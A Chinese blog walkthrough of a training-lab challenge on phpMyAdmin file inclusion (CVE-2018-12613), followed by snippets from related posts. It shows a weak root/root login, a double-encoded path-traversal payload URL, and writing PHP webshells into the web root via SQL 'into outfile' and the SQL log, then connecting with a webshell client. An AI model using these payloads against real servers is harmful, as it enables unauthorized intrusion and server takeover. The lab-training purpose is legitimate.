0x01.phpMyAdmin后台文件包含分析溯源

最新推荐文章于 2021-01-26 13:10:12 发布
最新推荐文章于 2021-01-26 13:10:12 发布
阅读量948 收藏 1
点赞数
分类专栏: 墨者学院 文章标签: 墨者学院 phpmyadmin文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31679787/article/details/100750888
版权

登录界面;

phpmyadmin的默认账户名密码是root/空,或者是root/root,尝试后发现是root/root;

通过打开新的phpmyadmin窗口,发现所有参数;

根据cve-2018-12613漏洞可以得到网站根目录/var/www/html;
首先select '<?php phpinfo();?>';然后通过payload构造文件包含;

payload:index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_加phpmyadmin的cookie

通过sql写入shell;

使用菜刀连接;

找到key文件;

使用into outfile前还试过SQL日志上传shell;

修改日志开关和路径;

在日志中写入shell;

但是shell被限制了不能执行;

附上phpmyadmin拿shell的方法

https://www.cnblogs.com/0xcc/p/5079275.html

CVE-2018-12613漏洞解析

https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog

半情调
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院-phpMyAdmin后台文件包含分析溯源
JimWu的博客
09-04 637
phpMyAdmin后台文件包含分析溯源 难易程度:★ 题目类型:文件包含 使用工具:FireFox浏览器、菜刀 1.打开靶场,出现登录页面。 2.使用弱口令root root成功登录。 3.打开sql,使用sql语句进行一句话木1马注入。 4.输入 select ‘<?php @eval($_POST[123])?>;’ into outfile ‘/var/www/html/12...
墨者学院CTF(phpMyAdmin后台文件包含分析溯源)
痴人说梦梦中人
09-11 3049
墨者学院CTF(phpMyAdmin后台文件包含分析溯源) 靶场地址: http://219.153.49.228:45122/ 相关知识: 1.phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) 2.php代码审计 3.base64编码绕过 思路: 利用过滤规则绕过php文件包含的黑白名单限制,再利用php的session会话机制,包含一句话木马文件获取shell...
墨者学院-入门级-phpMyAdmin后台文件包含分析溯源-小白必看(超详细)
kitiu666的博客
01-26 1304
2021年1月26日,第六次渗透测试。 实在抱歉,因为工作原因许久没有更新测试,期间生活也发生了很多事,现在心情也不怎么好,但也尽量讲细一点吧,开干! 准备需求: 1、win10系统; 2、中国菜刀; 1、进入靶场 账号:root 密码:root 这个账号密码都是看其他的教程知道的,至于怎样破解出来不知道,能力有限,过后我看看怎么来的吧。(如果了解再回来追跟); 2、进入到后台,到SQL页面,在控制台下输入以下命令,然后点击执行; select ‘<?php eval($_POST[key
墨者学院——phpMyAdmin后台文件包含分析溯源
知足且坚定,温柔且上进
02-09 515
此题利用一句话木马 进入登陆界面,用burpsuite爆破得到username与password都为:root 进入SQL界面,输入一句话木马(密码为leo),点击“执行”: select "<?php eval($_post[leo]);?>" into outfile "/var/www/html/3.php" 此时打开蚁剑(注意:url后面记得跟上一句话木马目标的页面3....
墨者学院---phpMyAdmin后台文件包含分析溯源--解题思路
weixin_43071873的博客
08-27 416
进入后台,使用弱口令尝试登入 如admin~admin,root-root等 本题为root-root 点到SQL,发现可以进行sql语句 select ‘<?php eval($_POST[giao]);?>’ into outfile ‘/var/www/html/2.php’ 3.执行成功 4.上菜刀 5.在根目录可以找到本题所需要的key 在www/html目录中可以找到写入的一句话木马 ...
phpMyAdmin配置文件config 详解.doc
01-12
了解配置文件的内容和作用可以帮助我们更好地使用 phpMyAdminphpMyAdmin 配置文件概述 phpMyAdmin 配置文件 config.inc.php 由多个部分组成,每个部分都有其特定的作用。下面我们将对每个部分进行详细的解释。 ...
PHPMyadmin 配置文件详解(配置)
10-29
PHPMyAdmin是一款基于Web的MySQL数据库管理工具,它允许用户通过浏览器轻松地管理和操作数据库,无需熟悉复杂的SQL命令。在本文中,我们将深入探讨PHPMyadmin的配置文件`config.inc.php`,它是整个应用程序的核心...
phpmyadmin config.inc.php配置示例
10-26
个config.inc.php文件为phpmyadmin的配置信息,下面有个已配置好的例子,大家可以参考下
墨者学院-日志文件分析溯源(Google蜘蛛)
qq_37850901的博客
09-27 277
根据题意,搜索谷歌爬虫的ip,在日志中ctrl+f尝试搜索bot 或google,结果中出现了这个 验证ip得到key
phpmyadmin文件包含
vergilben的学习日记
04-03 1万+
CVE-2018-12613 — 本地文件包含造成远程代码执行漏洞复现,其实就是我们常见的LFI漏洞。在我前面写的博客里面又详细介绍。这次我们直接进入墨者学院进行复现,不再自行搭建环境。 进入环境 这里使用弱口令进入,账号root,密码root。 进入之后页面如下: 执行sql语句挂入一句话木马 进入SQL执行页面 点击执行。 使用中国菜刀连接服务器 在根目录下我们发现key.txt文件,...
phpmyadmin文件包含漏洞
Hydra的博客
10-21 934
http://139.199.31.116:9008/index.php?target=db_sql.php%253f/../../../../../../flag.txt  
墨者学院_phpMyAdmin后台文件包含分析溯源
cc_de_csdn的博客
08-22 2515
墨者学院_phpMyAdmin后台文件包含分析溯源 phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑, 通过二次编码即可绕过检查,造成远程文件包含漏洞。 受影响版本: phpMyAdmin 4.8.0和4.8.1受到影响 前台可以使用弱口令直接登录...
phpMyAdmin后台文件包含分析溯源
asd158923328的博客
08-20 1468
靶场地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe 根据题意 进入访问页 弱口令进入,账号root,密码root 进入SQL执行 使用菜刀连接服务器 在根目录下我们发现key.txt文件 打开查看 ...
渗透测试-PhpMyAdmin后台文件包含漏洞
道阻且长,行则将至。
08-10 6282
漏洞背景 背景介绍 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 实训目标 1、了解此漏洞形成的原因; 2、掌握此漏洞的利用方式。 解题方向 根据漏洞编号找到相关知识。 攻击过程 墨者学院在线靶机:http://219.153.49.228:49400/index.php 直接...
CVE-2018-12613 PhpMyadmin后台文件包含分析
热门推荐
3569
06-27 1万+
2018年6月19日,phpmyadmin在最新版本修复了一个严重级别的漏洞.描述:一个攻击者可以在服务器上包含(查看和潜在执行)文件的漏洞被发现。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。攻击者必须经过身份验证,但在这些情况下除外:$ cfg ['AllowArbitraryServer'] = true:攻击者可以指定他/她已经控制...
墨者学院 - WebShell文件上传漏洞分析溯源(第5题)
多崎巡礼的博客
08-14 1714
弱口令 admin admin 进入后台 添加文章-上传asp一句话木马的图片马,记住返回的路径 当前数据库路径更改为上传一句话木马后返回的路径 备份数据库名称填写后缀为asp的文件名 菜刀链接即可   不能理解为什么数据库名是路径到文件,按理说应该是一个只到文件夹的路径才对。。。 言而总之,就是备份数据可以将文件重命名          ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值